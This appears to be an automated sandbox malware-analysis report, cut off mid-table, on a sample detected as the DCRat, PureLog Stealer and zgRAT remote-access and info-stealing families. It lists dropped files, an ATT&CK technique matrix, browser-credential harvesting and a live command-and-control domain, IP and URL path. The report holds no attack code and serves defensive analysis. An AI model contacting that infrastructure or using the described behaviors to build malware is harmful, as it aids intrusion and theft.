                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior

                          Remote Access Functionality

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 0000000D.00000002.2858831534.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.2858831534.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.2858831534.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.1922668864.0000000012CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: hyperbrokerhostNetsvc.exe PID: 6780, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe PID: 4520, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 5.0.hyperbrokerhostNetsvc.exe.630000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000005.00000000.1877081316.0000000000632000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1616007019.0000000006DF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\hyperbrokerhostNetsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\TextInputHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 5.0.hyperbrokerhostNetsvc.exe.630000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\hyperbrokerhostNetsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\TextInputHost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information11
                          Scripting                          		Valid Accounts141
                          Windows Management Instrumentation                          		11
                          Scripting                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		1
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		1
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		1
                          DLL Side-Loading                          		12
                          Process Injection                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory3
                          File and Directory Discovery                          		Remote Desktop Protocol1
                          Data from Local System                          		2
                          Non-Application Layer Protocol                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter                          		Logon Script (Windows)Logon Script (Windows)3
                          Obfuscated Files or Information                          		Security Account Manager157
                          System Information Discovery                          		SMB/Windows Admin Shares1
                          Clipboard Data                          		12
                          Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Software Packing                          		NTDS351
                          Security Software Discovery                          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets2
                          Process Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts142
                          Masquerading                          		Cached Domain Credentials261
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                          Virtualization/Sandbox Evasion                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                          Process Injection                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1403873 Sample: CJF0Ri1HrG.exe Startdate: 06/03/2024 Architecture: WINDOWS Score: 100 58 h172956.srv11.test-hf.su 2->58 62 Snort IDS alert for network traffic 2->62 64 Multi AV Scanner detection for domain / URL 2->64 66 Antivirus detection for URL or domain 2->66 68 10 other signatures 2->68 11 CJF0Ri1HrG.exe 3 6 2->11         started        signatures3 process4 file5 46 C:\PortCommon\hyperbrokerhostNetsvc.exe, PE32 11->46 dropped 48 C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe, data 11->48 dropped 14 wscript.exe 1 11->14         started        process6 signatures7 80 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->80 17 cmd.exe 1 14->17         started        process8 process9 19 hyperbrokerhostNetsvc.exe 3 30 17->19         started        23 conhost.exe 17->23         started        file10 38 C:\...\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, PE32 19->38 dropped 40 C:\...\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, PE32 19->40 dropped 42 C:\Users\user\Desktop\ylcWNDYf.log, PE32 19->42 dropped 44 17 other malicious files 19->44 dropped 70 Antivirus detection for dropped file 19->70 72 Multi AV Scanner detection for dropped file 19->72 74 Machine Learning detection for dropped file 19->74 76 Drops PE files to the user root directory 19->76 25 cmd.exe 1 19->25         started        signatures11 process12 process13 27 qvQdgMbCgPRxtGlzSvteAOftUbVX.exe 14 472 25->27         started        32 w32tm.exe 1 25->32         started        34 conhost.exe 25->34         started        36 chcp.com 1 25->36         started        dnsIp14 60 h172956.srv11.test-hf.su 91.227.16.11, 49735, 49736, 49739 EXIMIUS-ASRU Russian Federation 27->60 50 C:\Users\user\Desktop\vJfNUyGL.log, PE32 27->50 dropped 52 C:\Users\user\Desktop\sYzxNlvS.log, PE32 27->52 dropped 54 C:\Users\user\Desktop\pRCorSBW.log, PE32 27->54 dropped 56 11 other malicious files 27->56 dropped 78 Tries to harvest and steal browser information (history, passwords, etc) 27->78 file15 signatures16

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          CJF0Ri1HrG.exe58%ReversingLabsByteCode-MSIL.Trojan.Vigorf
                          CJF0Ri1HrG.exe49%VirustotalBrowse
                          CJF0Ri1HrG.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\Desktop\AFgebewE.log100%AviraHEUR/AGEN.1300079
                          C:\Users\user\Desktop\nxxgerdx.log100%AviraHEUR/AGEN.1300079
                          C:\Users\user\Desktop\kekpPWli.log100%AviraTR/PSW.Agent.qngqt
                          C:\Users\Public\TextInputHost.exe100%AviraHEUR/AGEN.1339906
                          C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe100%AviraVBS/Runner.VPG
                          C:\Users\user\Desktop\OnibhGNt.log100%AviraHEUR/AGEN.1300079
                          C:\Users\user\Desktop\avRZftgA.log100%AviraHEUR/AGEN.1300079
                          C:\Users\user\Desktop\XWBrRjTb.log100%AviraTR/PSW.Agent.qngqt
                          C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat100%AviraBAT/Runner.IL
                          C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe100%AviraHEUR/AGEN.1339906
                          C:\PortCommon\hyperbrokerhostNetsvc.exe100%AviraHEUR/AGEN.1339906
                          C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe100%AviraHEUR/AGEN.1339906
                          C:\Users\user\Desktop\PgdUomGa.log100%AviraHEUR/AGEN.1300079
                          C:\Users\user\Desktop\TOksRAfO.log100%AviraHEUR/AGEN.1362695
                          C:\Users\user\Desktop\KxrkaJNA.log100%AviraHEUR/AGEN.1300079
                          C:\Users\user\Desktop\GHBtTNNH.log100%AviraHEUR/AGEN.1362695
                          C:\Users\user\Desktop\AFgebewE.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\nxxgerdx.log100%Joe Sandbox ML
                          C:\Users\Public\TextInputHost.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe100%Joe Sandbox ML
                          C:\PortCommon\hyperbrokerhostNetsvc.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\jHHpWudE.log100%Joe Sandbox ML
                          C:\PortCommon\hyperbrokerhostNetsvc.exe92%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\PortCommon\hyperbrokerhostNetsvc.exe75%VirustotalBrowse
                          C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe92%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe75%VirustotalBrowse
                          C:\Program Files (x86)\Windows Photo Viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe92%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Program Files (x86)\Windows Photo Viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe75%VirustotalBrowse
                          C:\Users\Public\TextInputHost.exe92%ReversingLabsByteCode-MSIL.Trojan.Mardom
                          C:\Users\Public\TextInputHost.exe75%VirustotalBrowse
                          C:\Users\user\Desktop\AFgebewE.log4%ReversingLabs
                          C:\Users\user\Desktop\AFgebewE.log9%VirustotalBrowse
                          C:\Users\user\Desktop\CHTNxNAz.log12%ReversingLabs
                          C:\Users\user\Desktop\CHTNxNAz.log4%VirustotalBrowse
                          C:\Users\user\Desktop\EMydcNjR.log10%ReversingLabs
                          C:\Users\user\Desktop\EMydcNjR.log24%VirustotalBrowse
                          C:\Users\user\Desktop\EsydEbLs.log17%ReversingLabs
                          C:\Users\user\Desktop\EsydEbLs.log4%VirustotalBrowse
                          C:\Users\user\Desktop\GHBtTNNH.log12%ReversingLabs
                          C:\Users\user\Desktop\GHBtTNNH.log7%VirustotalBrowse
                          C:\Users\user\Desktop\KxrkaJNA.log17%ReversingLabs
                          C:\Users\user\Desktop\KxrkaJNA.log6%VirustotalBrowse
                          C:\Users\user\Desktop\OnibhGNt.log17%ReversingLabs
                          C:\Users\user\Desktop\OnibhGNt.log20%VirustotalBrowse
                          C:\Users\user\Desktop\PgdUomGa.log17%ReversingLabs
                          C:\Users\user\Desktop\PgdUomGa.log6%VirustotalBrowse
                          C:\Users\user\Desktop\QpUJDpSo.log13%ReversingLabs
                          C:\Users\user\Desktop\QpUJDpSo.log9%VirustotalBrowse
                          C:\Users\user\Desktop\RMxJvRbT.log9%ReversingLabs
                          C:\Users\user\Desktop\RMxJvRbT.log6%VirustotalBrowse
                          C:\Users\user\Desktop\RUhcZACY.log10%ReversingLabs
                          C:\Users\user\Desktop\RUhcZACY.log24%VirustotalBrowse
                          C:\Users\user\Desktop\TOksRAfO.log12%ReversingLabs
                          C:\Users\user\Desktop\TOksRAfO.log7%VirustotalBrowse
                          C:\Users\user\Desktop\WixjfVXd.log12%ReversingLabs
                          C:\Users\user\Desktop\WixjfVXd.log6%VirustotalBrowse
                          C:\Users\user\Desktop\XWBrRjTb.log62%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\XWBrRjTb.log69%VirustotalBrowse
                          C:\Users\user\Desktop\aMYstPaD.log12%ReversingLabs
                          C:\Users\user\Desktop\aMYstPaD.log6%VirustotalBrowse
                          C:\Users\user\Desktop\avRZftgA.log17%ReversingLabs
                          C:\Users\user\Desktop\avRZftgA.log20%VirustotalBrowse

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          SourceDetectionScannerLabelLink
                          h172956.srv11.test-hf.su13%VirustotalBrowse

                          URLs

                          SourceDetectionScannerLabelLink
                          http://www.tiro.com0%URL Reputationsafe
                          http://www.goodfont.co.kr0%URL Reputationsafe
                          http://www.carterandcone.coml0%URL Reputationsafe
                          http://www.sajatypeworks.com0%URL Reputationsafe
                          http://www.typography.netD0%URL Reputationsafe
                          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                          http://www.sandoll.co.kr0%URL Reputationsafe
                          http://www.urwpp.deDPlease0%URL Reputationsafe
                          http://www.sakkal.com0%URL Reputationsafe
                          http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                          http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                          http://h172956.srv11.test-hf.su100%Avira URL Cloudmalware
                          http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                          http://h172956.srv11.test-hf.su/100%Avira URL Cloudmalware
                          http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                          http://www.founder.com.cn/cn0%VirustotalBrowse
                          http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php100%Avira URL Cloudmalware
                          http://h172956.srv11.test-hf.su13%VirustotalBrowse
                          http://www.zhongyicts.com.cn1%VirustotalBrowse
                          http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                          http://h172956.srv11.test-hf.su/13%VirustotalBrowse
                          http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                          http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php15%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          h172956.srv11.test-hf.su
                          		91.227.16.11
                          		truetrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.phptrue
                          • 15%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.comqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersGqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers/?qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/bTheqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers?qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 